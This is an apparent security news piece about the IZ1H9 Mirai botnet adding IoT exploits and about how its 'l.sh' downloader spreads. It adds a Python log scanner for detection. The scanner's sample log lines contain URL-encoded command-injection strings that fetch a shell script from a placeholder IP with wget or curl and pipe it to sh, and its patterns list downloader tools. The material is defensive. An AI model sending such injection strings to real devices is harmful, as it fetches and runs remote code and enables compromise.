This significant evolution in the botnet was discovered during a new DDoS campaign when FortiGuard Labs observed a peak in vulnerability exploitation on September 6, with tens of thousands of exploit triggers observed.
Fortinet reports that the botnet now utilizes 13 new exploit payloads, ranging from flaws discovered in 2015 to those found in 2023. Among these, four flaws target D-Link devices, eight target Geutebruck products, one targets the Netis WF2419, one targets Korenix JetWave routers, and one targets the Sunhillo SureLine application. Additionally, there are 12 exploits targeting TOTOLINK routers.
The infection process involves injecting the IZ1H9 payload into a device after exploiting one of the mentioned vulnerabilities. The payload carries a command that instructs the device to download a shell script downloader named “l.sh” from a specific URL. Once executed, the script deletes logs to conceal its activity, retrieves bot clients built for different system architectures, and establishes communication with a C2 server to initiate various types of DDoS attacks.
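The exploitation stage described above leaves a recognisable trace in HTTP access logs: a request whose parameters carry a chained shell command that fetches and runs a script such as “l.sh”. The following detector is an added example written for this page; it is not Fortinet's code and not the botnet's. The log lines, the `/cgi-bin/device.cgi` path and the RFC 5737 addresses are constructed for illustration. It URL-decodes each request target before matching (encoded payloads are the norm), requires a downloader command plus a second indicator before flagging, and counts hits per day so a spike like the one FortiGuard Labs reported stands out.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample log lines (Apache "combined" style) using RFC 5737
# documentation addresses. Two lines carry a URL-encoded command-injection
# string that fetches "l.sh"; the rest are benign. None are real captures.
SAMPLE_LOG = """\
192.0.2.10 - - [06/Sep/2023:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.7 - - [06/Sep/2023:10:01:05 +0000] "GET /cgi-bin/device.cgi?cmd=cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F203.0.113.9%2Fl.sh%3B%20sh%20l.sh HTTP/1.1" 404 0 "-" "Hello-World"
192.0.2.11 - - [06/Sep/2023:10:02:09 +0000] "POST /api/login HTTP/1.1" 401 210 "-" "curl/8.0"
198.51.100.8 - - [06/Sep/2023:10:03:11 +0000] "POST /setup.cgi HTTP/1.1" 200 0 "-" "Hello-World"
198.51.100.9 - - [07/Sep/2023:03:15:44 +0000] "GET /cgi-bin/device.cgi?cmd=%60curl%20-s%20http%3A%2F%2F203.0.113.9%2Fl.sh%7Csh%60 HTTP/1.1" 404 0 "-" "Hello-World"
"""

# Fields of a combined-format line; the request target is what we inspect,
# deliberately ignoring the User-Agent so a benign "curl/8.0" client is not flagged.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) \S+'
)

DOWNLOADER_RE = re.compile(r'\b(wget|curl|tftp|ftpget)\b')   # fetch tooling
CHAIN_RE = re.compile(r'[;|`]|&&|\$\(')                       # command chaining
SCRIPT_RE = re.compile(r'\b[\w-]+\.sh\b')                     # e.g. l.sh


def decode_target(target):
    """URL-decode twice (handles double encoding) and lowercase for matching."""
    return unquote_plus(unquote_plus(target)).lower()


def classify_target(target):
    """Return the list of indicators found in a request target (empty if none)."""
    decoded = decode_target(target)
    reasons = []
    if DOWNLOADER_RE.search(decoded):
        reasons.append("downloader command")
    if CHAIN_RE.search(decoded):
        reasons.append("shell metacharacters")
    if SCRIPT_RE.search(decoded):
        reasons.append("shell script reference")
    return reasons


def is_downloader_injection(reasons):
    """Flag only when a fetch tool is combined with at least one more indicator."""
    return "downloader command" in reasons and len(reasons) >= 2


def scan_log(text):
    """Parse each line and return findings for requests that look like
    shell-downloader injection attempts."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        reasons = classify_target(m.group("target"))
        if is_downloader_injection(reasons):
            findings.append({
                "ip": m.group("ip"),
                "day": m.group("ts").split(":")[0],
                "target": decode_target(m.group("target")),
                "reasons": reasons,
            })
    return findings


def hits_per_day(findings):
    """Daily counts, the series to alert on when it spikes."""
    return dict(Counter(f["day"] for f in findings))


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f["day"], f["ip"], f["reasons"], f["target"])
    print("hits per day:", hits_per_day(found))
```

The two-indicator rule is what keeps the false-positive rate tolerable: a bare `wget` in a parameter name or a lone semicolon in a legitimate query is common, while a fetch tool chained with another command or pointing at a `.sh` file is not something a normal device UI sends. Tune the patterns to the devices you actually expose, and feed the per-day counts into whatever alerting you already run on exploit-attempt volume.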
Ultimately, it is crucial to address these vulnerabilities promptly to minimize the risks associated with device exposure. As the Mirai botnet continues to expand its arsenal of exploit triggers, timely application of security patches becomes increasingly important.